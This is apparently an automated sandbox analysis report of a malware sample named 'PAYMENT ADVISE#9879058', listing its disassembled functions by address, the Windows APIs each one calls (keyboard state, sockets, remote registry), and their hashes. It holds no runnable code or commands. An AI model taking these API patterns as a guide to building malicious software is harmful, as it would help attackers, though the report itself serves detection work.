                          Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 1038674560-2734436370
                          • Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                          • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                          • Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                          • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                          Function 0047439D Relevance: 12.3, APIs: 8, Instructions: 268COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61459f4a8200ef3d52de203114b28894f5d4b3bd8466eb3c739413db927d5df4
                          • Instruction ID: 650af14def374fe6fd11052fbef22cb8aa6c894e3601bf285572d08ae3c4fed9
                          • Opcode Fuzzy Hash: 61459f4a8200ef3d52de203114b28894f5d4b3bd8466eb3c739413db927d5df4
                          • Instruction Fuzzy Hash: 439192726043009BD710EF65DC82BABB3E9AFD4714F004D2EF548E7291D779E944875A
                          Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(?), ref: 0044157D
                          • GetDC.USER32(00000000), ref: 00441585
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                          • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                          • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                          • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                          • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                          Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                          Download Yara Rule
                          APIs
                          • ___set_flsgetvalue.LIBCMT ref: 004140E1
                            • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                            • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                            • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                          • ___fls_getvalue@4.LIBCMT ref: 004140EC
                            • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                          • ___fls_setvalue@8.LIBCMT ref: 004140FF
                            • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                          • ExitThread.KERNEL32 ref: 0041410F
                          • GetCurrentThreadId.KERNEL32 ref: 00414115
                          • __freefls@4.LIBCMT ref: 00414135
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                          • String ID:
                          • API String ID: 1925773019-0
                          • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                          • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                          • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                          • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                          Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON
                          Download Yara Rule
                          APIs
                          • VariantClear.OLEAUT32(00000038), ref: 004357C3
                          • VariantClear.OLEAUT32(00000058), ref: 004357C9
                          • VariantClear.OLEAUT32(00000068), ref: 004357CF
                          • VariantClear.OLEAUT32(00000078), ref: 004357D5
                          • VariantClear.OLEAUT32(00000088), ref: 004357DE
                          • VariantClear.OLEAUT32(00000048), ref: 004357E4
                          • VariantClear.OLEAUT32(00000098), ref: 004357ED
                          • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                          • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                          • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                          • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                          Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                            • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                          • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                          • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                          • _memset.LIBCMT ref: 00464B92
                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                          • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                          • WSACleanup.WSOCK32 ref: 00464CE4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                          • String ID:
                          • API String ID: 3424476444-0
                          • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                          • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                          • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                          • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                          Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON
                          Download Yara Rule
                          APIs
                          • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MetricsSystem
                          • String ID:
                          • API String ID: 4116985748-0
                          • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                          • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                          • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                          • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                          Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ConnectRegistry_wcslen
                          • String ID:
                          • API String ID: 535477410-0
                          • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                          • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                          • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                          • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                          Function 0045377F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                          • _memset.LIBCMT ref: 004538C4
                          • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                          • _wcslen.LIBCMT ref: 00453960
                          • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                          • String ID: 0
                          • API String ID: 3530711334-4108050209
                          • Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                          • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                          • Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                          • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                          Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                          • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Process$CloseCountersCurrentHandleOpen
                          • String ID: HH
                          • API String ID: 3488606520-2761332787
                          • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                          • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                          • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                          • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                          Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                          • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                          • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                          • LineTo.GDI32(?,?), ref: 004474BF
                          • CloseFigure.GDI32(?), ref: 004474C6
                          • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                          • Rectangle.GDI32(?,?), ref: 004474F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                          • String ID:
                          • API String ID: 4082120231-0
                          • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                          • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                          • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                          • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                          Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                          • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                          • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                          • LineTo.GDI32(?,?), ref: 004474BF
                          • CloseFigure.GDI32(?), ref: 004474C6
                          • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                          • Rectangle.GDI32(?,?), ref: 004474F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                          • String ID:
                          • API String ID: 4082120231-0
                          • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                          • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                          • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                          • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                          Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                          • String ID:
                          • API String ID: 288456094-0
                          • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                          • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                          • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                          • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                          Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 004449B0
                          • GetKeyboardState.USER32(?), ref: 004449C3
                          • SetKeyboardState.USER32(?), ref: 00444A0F
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                          • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                          • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                          • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                          Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 00444BA9
                          • GetKeyboardState.USER32(?), ref: 00444BBC
                          • SetKeyboardState.USER32(?), ref: 00444C08
                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                          • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                          • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                          • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                          Function 004498BD Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
